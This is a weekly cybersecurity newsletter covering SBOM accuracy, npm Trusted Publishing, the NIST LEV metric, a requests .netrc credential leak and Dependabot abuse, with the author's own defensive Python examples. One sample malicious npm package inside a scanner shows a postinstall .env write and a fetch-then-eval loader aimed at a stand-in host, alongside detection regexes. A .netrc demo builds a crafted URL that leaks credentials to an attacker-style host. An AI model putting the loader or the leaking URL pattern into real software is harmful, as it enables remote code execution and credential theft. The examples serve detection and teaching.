CramHacks Chronicles #86: Weekly Cybersecurity Newsletter!
Trusted Publishing for NPM, Likely Exploited Vulnerabilities (LEV), Correctness of SBOM Generation, Scalable Dynamic Malware Analysis for packages
Hello, and Happy Monday!
I’ve been going a bit overboard on the caffeine lately. I’ve also been processing a ridiculous amount of information thanks to writing this newsletter and my desperate need to know every little thing that happens in this industry.
This past week has undoubtedly been productive, but I’m very much looking forward to sitting at the beach and probably surfing 🏄♂️.
Excited to be speaking at Planet Cyber Sec AppSec SoCal next week 🥳!

Correctness of SBOM Generation: A Differential Analysis Approach
A study comparing SBOMs generated by Trivy, Syft, Microsoft’s sbom-tool, and GitHub’s dependency graph. The researchers generated SBOMs for 7,876 open-source projects written in Python, Ruby, PHP, Java, Swift, C#, Rust, Golang and JavaScript, then performed a differential analysis of the results.
👋 To no surprise, the results were inconsistent and not great for confidence in SBOMs. That said, the research used dated technologies. For instance, it used Trivy v0.43, which was released in June 2023; the other tool versions used also reflect June 2023 releases.
CVE/FIRST VulnCon 2025 Videos Released
Almost 100 videos covering everything from the current state of vulnerability management to future predictions and research on the effectiveness of methodologies.
Coming Soon: OpenID Connect (OIDC) Support for npm Registry
npm has announced that public beta for Trusted Publishing is coming (tentatively) in July 2025, joining the likes of PyPI, RubyGems, and Dart’s Pub.dev. This leverages OIDC tokens generated during CI/CD workflows to authenticate directly with the registry.
👋 For those unfamiliar, this is an alternative to using long-lived tokens for publishing packages, which are commonly abused by malicious actors. We’re still a long way away from this being reasonably audited or enforced for open source packages, but I look forward to getting there 🤞. More than 30,000 PyPI projects have voluntarily adopted Trusted Publishing to date.
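The part worth understanding is what the registry does with the token once it arrives. As an added example (mine, not npm’s or PyPI’s code), here is the trust-policy check a registry applies after it has already verified the token’s signature against the issuer’s JWKS. The claim names are the ones GitHub Actions puts in its OIDC tokens (iss, aud, exp, repository, job_workflow_ref, environment); the policy record, package name and repositories are constructed, and aud is assumed to be a plain string.

```python
"""Trusted-publishing policy check, as a registry would apply it to an OIDC
token presented by a CI job.  Added illustration, not npm's or PyPI's code.
Signature verification against the issuer's JWKS is assumed to have happened
before decode_claims() is called; only the policy decision is shown."""
import base64
import json
import time
from dataclasses import dataclass
from typing import Optional, Tuple

GITHUB_ISSUER = "https://token.actions.githubusercontent.com"


@dataclass(frozen=True)
class TrustedPublisher:
    """What a maintainer registers with the registry for one package (assumed shape)."""
    package: str
    repository: str                  # "owner/repo"
    workflow_file: str               # e.g. "release.yml" under .github/workflows/
    environment: Optional[str] = None  # optional GitHub environment to pin


def decode_claims(token: str) -> dict:
    """Return the JWT payload (middle segment, base64url without padding)."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))


def authorize_publish(token: str, publisher: TrustedPublisher, audience: str,
                      now: Optional[float] = None) -> Tuple[bool, str]:
    """Decide whether this token may publish publisher.package.

    Each check closes one misbinding: a token minted for another issuer or
    audience, any other repository at the same issuer, any other workflow in
    the right repository, a job outside the pinned environment, or an expired
    token."""
    c = decode_claims(token)
    now = time.time() if now is None else now
    if c.get("iss") != GITHUB_ISSUER:
        return False, "issuer mismatch"
    if c.get("aud") != audience:
        return False, "audience mismatch"
    if c.get("exp", 0) <= now:
        return False, "token expired"
    if c.get("repository") != publisher.repository:
        return False, "repository mismatch"
    # job_workflow_ref looks like "owner/repo/.github/workflows/release.yml@refs/tags/v1.2.3"
    expected_prefix = f"{publisher.repository}/.github/workflows/{publisher.workflow_file}@"
    if not c.get("job_workflow_ref", "").startswith(expected_prefix):
        return False, "workflow mismatch"
    if publisher.environment and c.get("environment") != publisher.environment:
        return False, "environment mismatch"
    return True, "ok"


def make_token(claims: dict) -> str:
    """Assemble a JWT-shaped string for the constructed examples (signature is a placeholder)."""
    def b64(obj: dict) -> str:
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
    return f"{b64({'alg': 'RS256', 'typ': 'JWT'})}.{b64(claims)}.sig"


# Constructed policy and tokens; the package and repositories are not real.
PUBLISHER = TrustedPublisher("left-pad-clone", "acme/left-pad-clone", "release.yml", "release")
NOW = 1_750_000_000
GOOD = make_token({
    "iss": GITHUB_ISSUER, "aud": "npm", "exp": NOW + 300,
    "repository": "acme/left-pad-clone", "environment": "release",
    "job_workflow_ref": "acme/left-pad-clone/.github/workflows/release.yml@refs/tags/v1.2.3",
})
WRONG_REPO = make_token({**decode_claims(GOOD), "repository": "mallory/left-pad-clone",
    "job_workflow_ref": "mallory/left-pad-clone/.github/workflows/release.yml@refs/heads/main"})
WRONG_WORKFLOW = make_token({**decode_claims(GOOD),
    "job_workflow_ref": "acme/left-pad-clone/.github/workflows/ci.yml@refs/heads/main"})

if __name__ == "__main__":
    for name, tok in [("good", GOOD), ("wrong repo", WRONG_REPO), ("wrong workflow", WRONG_WORKFLOW)]:
        print(name, authorize_publish(tok, PUBLISHER, "npm", now=NOW))
```

The repository and workflow checks are the ones that matter most in practice: a policy that only checks the issuer would accept a token from any GitHub repository, and one that skips the workflow path would accept any workflow that happens to run in the right repository, including one added by a compromised contributor.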
How Dynamic Analysis Revealed a Complex npm Attack Chain
SafeDep’s Kunal Singh shares how they used their scalable dynamic malware analysis infrastructure to reveal an npm attack chain.
👋 I was mostly interested in how the malicious package worked. Instead of containing the payload or being a simplistic dropper, it used a post-install script that writes to a .env file to set a URL that is used in the code to fetch and trigger next steps. There are so many other malicious opportunities through abusing environment variables and similar system files 👀.
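That shape (install hook, .env write, URL read back from the environment and fetched) is cheap to triage for statically, before you spend dynamic-analysis time on a package. Here is an added heuristic scanner of my own over an unpacked npm package; it is not SafeDep’s tooling, the sample package it scans is constructed, and the regexes are deliberately simple.

```python
"""Heuristic triage of an unpacked npm package for the pattern above: a
lifecycle script that writes a .env file plus code that fetches a URL taken
from the environment.  Added example, not SafeDep's tooling; the sample
package below is constructed and points at an invalid host."""
import json
import os
import re
import tempfile
from typing import Dict, List

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# fs.writeFileSync('.env', ...), appendFile(".env", ...), etc.
ENV_WRITE = re.compile(
    r"(writeFileSync|appendFileSync|writeFile|appendFile)\s*\(\s*['\"`][^'\"`]*\.env['\"`]")
# A URL pulled from process.env and handed straight to a fetcher.
ENV_FETCH = re.compile(r"(fetch|axios\.get|https?\.get|request)\s*\(\s*process\.env\.\w+")


def scan_package(root: str) -> Dict[str, List[str]]:
    """Collect install hooks, .env writes and env-driven fetches under root."""
    findings: Dict[str, List[str]] = {"lifecycle_scripts": [], "env_writes": [], "env_url_fetches": []}
    with open(os.path.join(root, "package.json"), encoding="utf-8") as f:
        pkg = json.load(f)
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings["lifecycle_scripts"].append(f"{hook}: {cmd}")
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith((".js", ".mjs", ".cjs")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, encoding="utf-8", errors="replace") as f:
                src = f.read()
            if ENV_WRITE.search(src):
                findings["env_writes"].append(rel)
            if ENV_FETCH.search(src):
                findings["env_url_fetches"].append(rel)
    return findings


def is_suspicious(findings: Dict[str, List[str]]) -> bool:
    """Flag only the combination: an install hook, an .env write and an env-driven fetch."""
    return bool(findings["lifecycle_scripts"] and findings["env_writes"] and findings["env_url_fetches"])


# Constructed sample package reproducing the shape; no real package or host.
SAMPLE_FILES = {
    "package.json": json.dumps({"name": "totally-legit-utils", "version": "1.0.0",
                                "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": "const fs = require('fs');\n"
                "fs.writeFileSync('.env', 'UPDATE_URL=https://invalid.example/stage2\\n');\n",
    "index.js": "require('dotenv').config();\n"
                "fetch(process.env.UPDATE_URL).then(r => r.text()).then(eval);\n",
}


def write_sample_package() -> str:
    """Materialise SAMPLE_FILES in a temp directory and return its path."""
    root = tempfile.mkdtemp()
    for rel, content in SAMPLE_FILES.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    found = scan_package(write_sample_package())
    print(json.dumps(found, indent=2), "suspicious:", is_suspicious(found))
```

Any one of the three signals on its own is common in benign packages (plenty of build tools have a prepare script, and dotenv is everywhere); requiring all three keeps the false-positive rate tolerable for a first pass and hands the remaining hits to the sandbox.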
NIST: Proposes New Metric - Likely Exploited Vulnerabilities (LEV)
The equation combines a vulnerability’s historical EPSS scores into the probability that it has been observed to be exploited in the wild at some point in the past.
👋 EPSS is improving year after year, but I don’t know if it’s at a place where I’d be looking to build metrics based on its data. It has plenty of faults and I fear this just adds more variability. Cool research nonetheless, and likely effective at scale.
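To make the variability concern concrete, here is an added example of my own of how a roll-up of this kind behaves. It follows my reading of the NIST proposal rather than quoting it: an EPSS score is the probability of exploitation within the next 30 days, so one score per 30-day window is treated as an independent trial and the windows are combined with the complement rule. The partial-window weighting at the end of the range is my assumption, and the score series are constructed.

```python
"""LEV-style roll-up of historical EPSS scores into P(exploited at least once).
Added illustration written from my reading of the NIST proposal, not its
reference code.  Each 30-day window contributes one EPSS sample as an
independent trial; a trailing partial window is weighted by its fraction of
30 days (assumption)."""
from datetime import date, timedelta
from typing import Dict, List, Tuple

WINDOW_DAYS = 30


def sample_every_window(scores: Dict[date, float], d0: date, dn: date) -> List[Tuple[date, float, float]]:
    """Walk from d0 to dn in 30-day steps, yielding (window_start, epss, weight).
    weight is 1.0 for a full window and (days remaining)/30 for a trailing partial one.
    The series is assumed to have a score on every window start."""
    out = []
    d = d0
    while d < dn:
        remaining = (dn - d).days
        weight = min(remaining, WINDOW_DAYS) / WINDOW_DAYS
        out.append((d, scores[d], weight))
        d += timedelta(days=WINDOW_DAYS)
    return out


def lev(scores: Dict[date, float], d0: date, dn: date) -> float:
    """P(exploited at least once in [d0, dn)) = 1 - prod_i (1 - epss_i * w_i)."""
    p_never = 1.0
    for _, epss, w in sample_every_window(scores, d0, dn):
        p_never *= 1.0 - epss * w
    return 1.0 - p_never


def constant_series(p: float, d0: date, windows: int) -> Dict[date, float]:
    """A constructed series: the same EPSS score on every window start."""
    return {d0 + timedelta(days=WINDOW_DAYS * i): p for i in range(windows)}


# Constructed inputs, not real CVE data.
D0 = date(2024, 1, 1)
SAMPLE = {D0: 0.10, D0 + timedelta(days=30): 0.20, D0 + timedelta(days=60): 0.40}
SAMPLE_END = D0 + timedelta(days=75)      # two full windows and a half window
TWO_YEARS_END = D0 + timedelta(days=720)  # 24 full windows


def sample_lev() -> float:
    """1 - 0.9 * 0.8 * (1 - 0.40 * 0.5) = 0.424"""
    return lev(SAMPLE, D0, SAMPLE_END)


def modest_score_over_two_years(p: float = 0.05) -> float:
    """A flat 5% EPSS held for two years compounds to 1 - 0.95**24, roughly 0.71."""
    return lev(constant_series(p, D0, 24), D0, TWO_YEARS_END)


if __name__ == "__main__":
    print(f"sample window LEV: {sample_lev():.3f}")
    print(f"flat 0.05 for 24 windows: {modest_score_over_two_years():.3f}")
```

The second function is the point behind the worry above: a score that looks unremarkable in any single EPSS snapshot compounds into a high cumulative probability over a long window, so any noise or drift in the underlying scores is amplified rather than averaged out.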
CVE-2024-47081: Netrc credential leak in PSF requests library
A vulnerability in the popular requests library was reported back in September 2024, and has not yet been fixed, nor has it been publicly disclosed (before this week). If you maintain a .netrc file containing credentials, they will be leaked to the target host.
👋 More discussion on Hacker News. Vulnerable code snippet here.
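The general pitfall behind leaks of this kind is selecting .netrc credentials by a host name derived from the wrong part of the URL. Below is an added example of my own showing the difference between keying the lookup on a naive split of the URL’s netloc and keying it on the parsed hostname, which is the name the connection actually goes to. This is not the requests code path and makes no claim about its exact trigger; the .netrc contents and URLs are constructed.

```python
"""Host-keyed .netrc lookup: credentials must be chosen by the host the
request will actually connect to.  Added illustration of the general pitfall,
not the requests implementation; the .netrc file and URLs are constructed."""
import netrc
import os
import tempfile
from typing import Callable, Optional, Tuple
from urllib.parse import urlparse

NETRC_TEXT = """\
machine api.example.com
  login ci-bot
  password s3cr3t-token
"""


def write_constructed_netrc() -> str:
    """Write NETRC_TEXT to a private temp file and return its path."""
    path = os.path.join(tempfile.mkdtemp(), ".netrc")
    with open(path, "w", encoding="utf-8") as f:
        f.write(NETRC_TEXT)
    os.chmod(path, 0o600)
    return path


def naive_host(url: str) -> str:
    """The wrong key: netloc still carries any user:pass@ prefix, so a crafted
    URL can place a trusted host name in the userinfo part."""
    return urlparse(url).netloc.split(":")[0]


def real_host(url: str) -> Optional[str]:
    """The right key: hostname strips userinfo and port."""
    return urlparse(url).hostname


def netrc_auth(url: str, netrc_path: str,
               host_of: Callable[[str], Optional[str]] = real_host) -> Optional[Tuple[str, str]]:
    """Return (login, password) from the .netrc entry for the URL's host, or None."""
    host = host_of(url)
    entry = netrc.netrc(netrc_path).authenticators(host) if host else None
    if entry is None:
        return None
    login, _account, password = entry
    return login, password


# Constructed: a URL whose userinfo portion is spelled like the trusted host.
CRAFTED = "https://api.example.com:x@evil.example.net/upload"
NETRC_PATH = write_constructed_netrc()

if __name__ == "__main__":
    print("naive key ->", naive_host(CRAFTED), netrc_auth(CRAFTED, NETRC_PATH, host_of=naive_host))
    print("real key  ->", real_host(CRAFTED), netrc_auth(CRAFTED, NETRC_PATH))
    print("legit URL ->", netrc_auth("https://api.example.com/v1", NETRC_PATH))
```

Two caveats for requests users specifically: the library only consults .netrc when a Session’s trust_env is True (the default) and no explicit auth was supplied, so passing auth= on the request or setting session.trust_env = False (which also stops it reading proxy environment variables) is the practical mitigation until you can upgrade.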
Weaponizing Dependabot: Pwn Request at its finest
Details on how to abuse GitHub bots such as Dependabot as a confused deputy, bypassing PR reviews to merge malicious code.
More Links
👋 I honestly haven’t read either of these articles in-depth, but I’m not at all surprised. The world is moving too fast to be secure, and I’ve come to terms with that. What does tick me off is that many corporations, including the biggest one (the US govt), continue to cut funding on security programs. But if your business is dead, you don’t need security 🤷. Part of why I hate the instability of the tech industry: a company burning billions with a limited runway will never prioritize security.
Until Next Time! 👋
Hey, you made it to the bottom – thanks for sticking around!
Questions, ideas, or want to chat? Slide into my inbox! 💌
Don’t hesitate to forward if someone could benefit from this.
See you next Monday!
-Kyle
P.S. CramHacks has a Supporter tier! You can upgrade here to support CramHacks and its free weekly content 😃.